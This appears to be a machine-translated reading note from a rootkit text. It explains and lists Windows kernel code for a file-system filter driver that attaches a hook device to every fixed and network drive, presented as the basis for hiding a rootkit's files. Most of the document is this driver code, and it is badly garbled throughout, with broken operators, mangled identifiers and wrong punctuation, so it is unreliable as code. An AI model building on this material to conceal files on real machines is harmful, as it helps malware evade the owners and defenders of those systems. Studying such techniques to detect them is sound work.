Reading Note _ Rootkit Technology _ file Filter Driver (1)


Layered drivers can also be applied to file systems. Because of its potential, the file system holds a special attraction for a rootkit: many rootkits need to store files on the file system, and those files must be hidden. Hooking can be used to hide files, but that method is easy to detect; in addition, files or directories that live on an SMB share cannot be hidden by a system service descriptor table (SSDT) hook. The following shows how to hide a file by using a layered driver.

First, let's look at the driver's entry routine, DriverEntry:

// Driver entry point. Points every IRP major-function slot at one dispatch
// routine (OurDispatch) and installs a fast I/O dispatch table (OurFastIOHook),
// so every request that reaches a device this driver attaches goes through
// those two tables. The listing is cut off after the FastIoDispatch assignment,
// so the rest of the body (and the returned status) is not visible here.
// Transcription note: the return type and name run together ("NTSTATUSDriverEntry"),
// "MajorFunctionp" reads as MajorFunction, and the loop index I, OurDispatch and
// OurFastIOHook are not declared in this excerpt.
NTSTATUSDriverEntry (IN PDRIVER_OBJECT DriverObject,

IN PUNICODE_STRINGRegistryPath)

{

// Fill the whole table (0..IRP_MJ_MAXIMUM_FUNCTION) with the same routine.
For (I = 0; I <= IRP_MJ_MAXIMUM_FUNCTION; I ++)

{

DriverObject-> MajorFunctionp [I] = OurDispatch;

}

// Fast I/O is a second request path for file-system devices; it is hooked too.
DriverObject-> FastIoDispatch = & OurFastIOHook;

In the DriverEntry routine, every entry of the MajorFunction array is pointed at the OurDispatch dispatch routine, and a FastIoDispatch table is installed. Here we can see something specific to file system drivers: Fast I/O is another path by which the system communicates with a file system driver.

After preparing the dispatch tables, the drives must be hooked; the HookDriveSet function is called to install the hook on all available drive letters:

// Hook-installation sequence (presumably the continuation of DriverEntry's body,
// as the prose above says): clears the per-letter hook device table, asks
// GetDrivesToHook for the bitmask of drive letters to hook, and hands that mask
// to HookDriveSet. DriveHookDevices[] (26 entries) and DrivesToHook are
// file-scope state used by HookDriveSet/HookDrive below; neither is declared in
// this excerpt. Identifier casing is garbled throughout this transcription.
DWORD d_hdrives = 0;

// Initialize the drives we will hook

For (I = 0; I <26; I ++)

Drivehookdevices [I] = NULL;

Drivetohook = 0;

// Bitmask of drive letters returned through the out-parameter.
Ntstatus = getdrivestohook (& d_hdrives );

If (! Nt_success (ntstatus ))

Return ntstatus;

Hookdriveset (d_hdrives, driverobject );

The following code obtains the set of drives to be hooked:

// GetDrivesToHook: builds the bitmask of drive letters that should be hooked.
// It starts from the current process's device map and strips the drive types
// listed in the switch further below (unknown, no-root-dir, removable, CD-ROM).
// Returns STATUS_UNSUCCESSFUL when d_hookDrives is NULL, otherwise the status of
// the ZwQueryInformationProcess call; the resulting mask is written through
// d_hookDrives only on success.
// Transcription note: the return type and name run together here
// ("Ntstatusgetdrivestohook"), and the declaration "Ntstatus;" below reads as
// "NTSTATUS ntStatus;".
Ntstatusgetdrivestohook (DWORD * d_hookdrives)

{

Ntstatus;

// Device map of the calling process (drive bitmap plus per-drive type).
Process_devicemap_information s_devmap;

DWORD maxdriveset, curdriveset;

Int drive;

// Reads as "if (d_hookDrives == NULL)": a NULL out-parameter is rejected.
If (d_hookDrives = NULL)

Return STATUS_UNSUCCESSFUL;

Note the use of the current process handle here:

// Query the device map of the current process (the handle value 0xffffffff is
// the current-process pseudo-handle; the cast is garbled in this transcription).
Ntstatus = ZwQueryInformationProcess (HANDLE) 0 xffffffff,

ProcessDeviceMap,

& S_devMap,

Sizeof (s_devMap ),

NULL );

If (! NT_SUCCESS (ntstatus ))

Return ntstatus;

// Get available drives we can monitor.

// DriveMap has one bit per existing drive letter; CurDriveSet starts as a copy
// and has the unwanted drive types cleared in the switch below.
MaxDriveSet = s_devMap.Query.DriveMap;

CurDriveSet = MaxDriveSet;

// Note: this loop scans 32 bits, while the hook tables elsewhere on this page
// are sized for 26 drive letters.
For (drive = 0; drive <32; ++ drive)

{

// "1 <drive" reads as "1 << drive" (same for every shift on this page).
If (MaxDriveSet & (1 <drive ))

{

Switch (s_devMap.Query.DriveType [drive])

{

First, the drive types to be skipped are handled:

// We don't like these: remove them.

// Unknown and no-root-directory drives are dropped from the mask.
// (The ";" after DRIVE_NO_ROOT_DIR and DRIVE_CDROM reads as ":" — transcription.)
Case DRIVE_UNKNOWN: // The drive type cannot be determined.

Case DRIVE_NO_ROOT_DIR; // The root directory does not exist.

CurDriveSet & = ~ (1 <drive );

Break;

// The drive is removable.

// Doesn't make sense to put hidden files on

// A removable drive because we will not

// Necessarily control the computer that

// Drive is mounted on next.

Case DRIVE_REMOVABLE:

CurDriveSet & = ~ (1 <drive );

Break;

// The drive is a CD-ROM drive

Case DRIVE_CDROM;

CurDriveSet & = ~ (1 <drive );

Break;

The remaining drive types are kept: DRIVE_FIXED, DRIVE_REMOTE and DRIVE_RAMDISK.

The code continues as follows:

// Closing braces for the switch, the per-drive if, and the for loop.
}

}

}

// Hand the filtered mask back to the caller; ntstatus is still the successful
// status from ZwQueryInformationProcess at this point.
* D_hookDrives = CurDriveSet;

Return ntstatus;

}

The code for hooking a set of drives is as follows:

// Reconciles the hooked-drive state with DriveSet (bit N = drive letter 'A'+N):
// every letter set in DriveSet but not yet in DrivesToHook is hooked via
// HookDrive(); every letter clear in DriveSet but present in DrivesToHook is
// unhooked via UnhookDrive(). Letters whose DriveHookDevices[] entry is the same
// device object are treated as one group and hooked/unhooked together, and
// DriveSet is adjusted to reflect what actually happened. Stores the resulting
// mask in the file-scope DrivesToHook and returns it.
// DrivesToHook, DriveHookDevices[], HookDrive and UnhookDrive are not declared in
// this excerpt; hookExt is declared but never used in the visible body.
// Transcription note: equality tests appear as "=", "&&" as "&" on one line,
// shifts as "1 <I", and the closing ")" of the for header as "_".
ULONG HookDriveSet (in ulong DriveSet, IN PDRIVER_OBJECT DriverObject)

{

PHOOK_EXTENSION hookExt;

ULONG drive, I;

ULONG bit;

// Scan the drive table, looking for hits on the DriveSet bitmask.

For (drive = 0; drive <26; ++ drive _

{

Bit = 1 <drive;

// Are we supposed to hook this drive?

// Reads as "if ((bit & DriveSet) && !(bit & DrivesToHook))": wanted, not yet hooked.
If (BIT & driveset )&&! (BIT & drivestohook ))

{

If (! Hookdrive (drive, driverobject ))

{

// Remove from drive set if it can't be hooked

Driveset & = ~ Bit;

}

Else

{

// Hook drives in the same drive group

// Any other letter served by the same device object is now hooked as well,
// so it is added to the mask (HookDrive records the shared device for it).
For (I = 0; I <26; I ++)

{

If (drivehookdevices [I] = drivehookdevices [Drive])

{

Driveset | = (1 <I );

}

}

}

}

// Reads as "else if (!(bit & DriveSet) && (bit & DrivesToHook))": hooked, no longer wanted.
Else if (! (Bit & DriveSet) & (bit & DrivesToHook ))

{

// Unhook this drive and all in the group

For (I = 0; I <26; I ++)

{

If (DriveHookDevices [I] = DriveHookDevices [drive])

{

UnhookDrive (I );

DriveSet & = ~ (1 <I );

}

}

}

}

// Return set of drives currently hooked.

DrivesToHook = DriveSet;

Return DriveSet;

}

The code for installing and removing the hook on a single drive is as follows (only the tail of the unhook routine is reproduced here):
// Tail of the unhook routine (its header is not reproduced on this page):
// if a hook device exists for this letter, clear the Hooked flag in its
// extension. In the visible code nothing is detached or deleted — only the
// flag changes, so the hook device presumably stays attached and its dispatch
// routine decides what to do from the flag.
If (DriveHookDevices [Drive])

{

HookExt = DriveHookDevices [Drive]-> DeviceExtension;

HookExt-> Hooked = FALSE;

}

}

 

// Attaches a hook (filter) device belonging to DriverObject on top of the file
// system device that backs drive letter Drive (0 = 'A'). Returns TRUE when the
// letter is hooked after the call — newly attached, already hooked (the Hooked
// flag is set again), or served by a device object that another letter already
// hooked — and FALSE when Drive >= 26 or any of the open / reference / create /
// attach steps fails. Every failure path releases the file object and handle it
// acquired. On success the hook device is stored in DriveHookDevices[Drive].
// Called from HookDriveSet.
BOOLEAN HookDrive (in ulong Drive, IN PDRIVER_OBJECT DriverObject)

{

IO_STATUS_BLOCK ioStatus;

HANDLE ntFileHandle;

OBJECT_ATTRIBUTESobjectAttributes;

// Device object that will receive IRPs for the opened root directory.
PDEVICE_OBJECTfileSysDevice;

// Our filter device, created below and attached on top of fileSysDevice.
PDEVICE_OBJECT hookDevice;

UNICODE_STRINGfileNameUnicodeString;

PFILE_FS_ATTRIBUTE_INFORMATIONfileFsAttributes;

ULONG fileFsAttributesSize;

// Template path "\DosDevices\ :\" with a placeholder for the drive letter at
// index 12 (the backslashes are garbled in this transcription).
WCHAR filename [] = L "\ DosDevices \ :\\";

NTSTATUS ntStatus;

Ulong I;

PFILE_OBJECT fileObject;

PHOOK_EXTENSIONhookExtension;

If (Drive> = 26)

Return FALSE; // Illegal drive letter

// Test whether we have hooked this drive

// Reads as "== NULL": only a letter with no hook device yet goes through the attach path.
If (DriveHookDevices [Drive] = NULL)

{

// Patch the drive letter into the template; the element is a WCHAR, so the
// (CHAR) cast is widened again on assignment.
Filename [12] = (CHAR) ('A' + Drive); // Set up drive name

The root directory of the volume is opened next:

RtlInitUnicodeString (& fileNameUnicodeString, filename );

InitializeObjectAttributes (& objectAttributes,

& FileNameUnicodeString, OBJ_CASE_INSENSITIVE, NULL, NULL );

// Open the volume's root directory (FILE_OPEN + FILE_DIRECTORY_FILE) for
// synchronous I/O; the handle is only used to reach the file object and the
// device behind it, and is closed before every return.
// "File_pai_read | file_pai_write" reads as FILE_SHARE_READ | FILE_SHARE_WRITE.
NtStatus = ZwCreateFile (& ntFileHandle,

SYNCHRONIZE | FILE_ANY_ACCESS,

& ObjectAttributes,

& IoStatus,

NULL,

0,

File_pai_read | file_pai_write,

FILE_OPEN,

FILE_SYNCHRONOUS_IO_NONALERT | FILE_DIRECTORY_FILE,

Null,

0 );

If (! Nt_success (ntstatus ))

{

If the drive cannot be opened, FALSE is returned:

Return false;

}

// Use the file handle to look up the file object.

// If this is successful,

// we must eventually dereference the file object

// Turn the handle into a referenced FILE_OBJECT (access check done as
// KernelMode); the matching ObDereferenceObject appears on every later exit path.
Ntstatus = obreferenceobjectbyhandle (ntfilehandle,

FILE_READ_DATA,

NULL,

KernelMode,

& Fileobject,

NULL );

If (! NT_SUCCESS (ntStatus ))

{

If the file object cannot be obtained from the handle, FALSE is returned:

// Only the handle exists at this point, so only the handle is released.
ZwClose (ntFileHandle );

Return FALSE;

}

// Get the device object from the file object

// Resolve the device object that IRPs for this file object are sent to; this
// is the file-system (volume) device the hook device is attached to below.
FileSysDevice = IoGetRelatedDeviceObject (fileObject );

If (! FileSysDevice)

{

If the device object cannot be obtained, FALSE is returned:

ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

Return FALSE;

}

// Check the device list to see if we are already

// attached to this particular device.

// This can happen when more than one drive letter

// is being handled by the same network

// redirector

// Reads as "== fileSysDevice": another letter already hooked this device object.
For (I = 0; I <26; I ++)

{

If (DriveHookDevices [I] = fileSysDevice)

{

// If we are already watching it,

// associate this drive letter

// with the others that are handled

// by the same network driver. This enables us to intelligently update

// the hooking menus when the user specifies that one of the group should not be

// watched - we mark all of the related drives as unwatched as well.

// The shared device object (not a new hook device) is recorded for this letter;
// HookDriveSet relies on that equality to treat the letters as one group.
// "DriveHookDevice" here reads as DriveHookDevices (transcription).
ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

DriveHookDevice [Drive] = fileSysDevice;

Return TRUE;

}

}

// The file system's device hasn't been hooked already, so make a hooking device object that will be attached to it

// Unnamed device (DeviceName = NULL) with a HOOK_EXTENSION-sized extension,
// non-exclusive (FALSE), copying the target's DeviceType and Characteristics —
// presumably so it presents the same type as the device it will sit on.
// The "." after DeviceType reads as "," (transcription).
NtStatus = IoCreateDevice (DriverObject,

Sizeof (HOOK_EXTENSION ),

NULL,

FileSysDevice-> DeviceType.

FileSysDevice-> Characteristics,

FALSE,

& HookDevice );

If (! NT_SUCCESS (ntStatus ))

{

If the hook device cannot be created, FALSE is returned:

ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

Return FALSE;

}

// Clear the device's init flag.

// If we do not clear this flag, it is suspected nobody else would be able to layer on top

// of us. This may be a useful feature in the future!

// "DO_DEVICE_INITIALIZEING" reads as DO_DEVICE_INITIALIZING and "DO_DIRECT_TO" as
// DO_DIRECT_IO (transcription). The buffering flags are copied from the target so
// the hook device handles request buffers the same way as the device below it.
HookDevice-> Flags & = ~ DO_DEVICE_INITIALIZEING;

HookDevice-> Flags | = (fileSysDevice-> Flags & (DO_BUFFERED_IO | DO_DIRECT_TO ));

// Set up the device extension. The drive letter and file system object are stored in

// the extension.

// STANDARD (the Type value) is not defined in this excerpt.
HookExtension = hookDevice-> DeviceExtension;

HookExtension-> LogicalDrive = 'A' + Drive;

HookExtension-> FileSystem = fileSysDevice;

HookExtension-> Hooked = TRUE;

HookExtension-> Type = STANDARD;

// Finally, attach to the device. As soon as we are successfully attached, we may start

// processing IRPs targeted at the device we are hooked to.

// NOTE(review): once this call succeeds the hook device is a member of the
// volume's device stack; from a defensive standpoint, such legacy attachments
// can be found by enumerating that stack from the file-system device object
// (not shown on this page).
NtStatus = IoAttachDeviceByPointer (hookDevice, fileSysDevice );

If (! NT_SUCCESS (ntStatus ))

{

// NOTE(review): the device object created by IoCreateDevice above is not
// deleted on this failure path in the visible code.
ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

Return FALSE;

}

 

// Determine whether this is an NTFS drive

 

// Allocate a FILE_FS_ATTRIBUTE_INFORMATION buffer (plus MAXPATHLEN, which is
// not defined in this excerpt) from non-paged pool and fill it from the volume.
// On query failure the buffer is freed and the pointer cleared; no use of the
// result (e.g. the NTFS check the comment above announces) is visible here.
// "fileFSAttributesSize", "hookExtesnion" and the trailing "_" are transcription
// errors for fileFsAttributesSize, hookExtension and ")".
FileFsAttributesSize = sizeof (FILE_FS_ATTRIBUTE_INFORMATION) + MAXPATHLEN;

HookExtension-> FsAttributes = (PFILE_FS_ATTRIBUTE_INFORMATION)

ExAllocatePool (NonPagedPool, fileFsAttributesSize );

If (hookExtension-> FsAttributes &&! NT_SUCCESS (

IoQueryVolumeInformation (fileObject, FileFsAttributeInformation, fileFSAttributesSize,

HookExtension-> FsAttributes,

& FileFsAttributesSize )))

{

// On failure, we just don't have attributes for this file system.

ExFreePool (hookExtesnion-> FsAttributes _;

HookExtension-> FsAttributes = NULL;

}

// Close the file and update the hooked drive list by entering a pointer to the hook

// device object in it.

ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

DriveHookDevices [Drive] = hookDevice;

}

Else // This drive is already hooked

{

// Re-enable an existing hook device by setting its flag again (the counterpart
// of the flag clear in the unhook routine).
HookExtension = DriveHookDevices [Drive]-> DeviceExtension;

HookExtension-> Hooked = TRUE;

}

Return TRUE;

}

 

 

;

 

 

 

 

 
